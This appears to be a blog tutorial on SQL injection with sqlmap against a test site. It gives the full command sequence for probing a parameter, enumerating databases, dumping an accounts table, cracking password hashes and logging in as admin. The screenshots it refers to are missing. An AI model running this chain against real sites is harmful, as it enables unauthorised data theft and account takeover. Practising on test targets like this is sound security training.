http://sqlmap.sourceforge.net/
For this tutorial, our target will be-
http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake
Now then, let's fire up sqlmap and get started.
First of all, the web page you are viewing should look like this-
If you are not seeing the above web page, check the URL you entered and make sure you are connected to the Internet. At this point, we know that the Get parameter "name" is returning a value of Rake. We will us an apostrophe as a test for an SQL vulnerability in the database server. Now our URL should look like this-
http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake'
Reload the web page, and view the output, which should look like this-
From the above output of the web page, we can assume poorly written SQL code was written for a MySQL database server, and that it is indeed vulnerable.
At this point we can attack the database server using sqlmap. So fire up sqlmap in your terminal and type-
./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake
Your output for this command will look like this-
From the output of sqlmap, we know that it is possible to inject SQL queries using sqlmap. Now we need to find all the databases. To do this, type-
./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake --dbs
This command will enumerate all databases in the MySQL server. This should be your output-
From this output, we can see two databases-
scanme
information_schema
Now we will enumerate all the tables within the scanme database. To do this, type-
./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme --tables
Here is the output-
This may be me, but I am willing to bet that user credentials are going to be found in the accounts table. Let's find out-
./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --columns
And here's the output-
From this output we can see that there are 5 columns-
fname
id
lname
passwd
uname
Now we can dump all the rows of data from whatever columns we want. Let's dump all of it, shall we?
./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --dump
Here is the output-
Hmm. Our output tells us that sqlmap recognized some hash values, more likely than not from the passwd column. At least security for the MySQL server isn't totally worthless.... Oh well. Let's use sqlmap's built in password cracking utility that can crack the hashes by collision, such as hash values implementing the MD5 algorithm. So as an answer to sqlmap's question, type
Y
select the default wordlist for the password utility by hitting Enter
, and enter N
(we don't yet need any password suffixes)-From the output, the hash values have been cracked, and we have privileges for all users, including admin. Now browse to-
http://www.webscantest.com/login.php
From here you can login as admin. Happy hacking!
No comments:
Post a Comment